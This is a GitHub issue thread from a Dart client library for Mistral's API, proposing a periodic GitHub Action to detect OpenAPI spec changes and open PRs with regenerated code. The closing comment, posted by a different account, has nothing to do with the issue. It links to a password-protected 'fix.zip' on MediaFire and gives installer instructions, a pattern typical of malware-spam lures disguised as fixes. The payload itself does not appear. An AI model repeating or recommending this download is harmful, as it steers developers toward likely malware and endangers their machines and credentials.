### ISSUE TITLE
feat: Automatic detection of changes in the Mistral's OpenAPI spec

### ISSUE THREAD

**Issue by gawi151** [nomtek/mistralai_client_dart#68]
**Is your feature request related to a problem? Please describe.**
We want to have a way to detect when we should re-generate the client when official OAS changes.

**Describe the solution you'd like**
Create a periodic github action that will check the file on regular basis and if the file has changed then create a PR with generated code to review.

**Describe alternatives you've considered**
Observe webhook to the file on Mistral's docs repo and based on changes to the file create a PR with generated code to review.
Not possible without 3rd party application that will observe change and trigger workflow in our repository.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
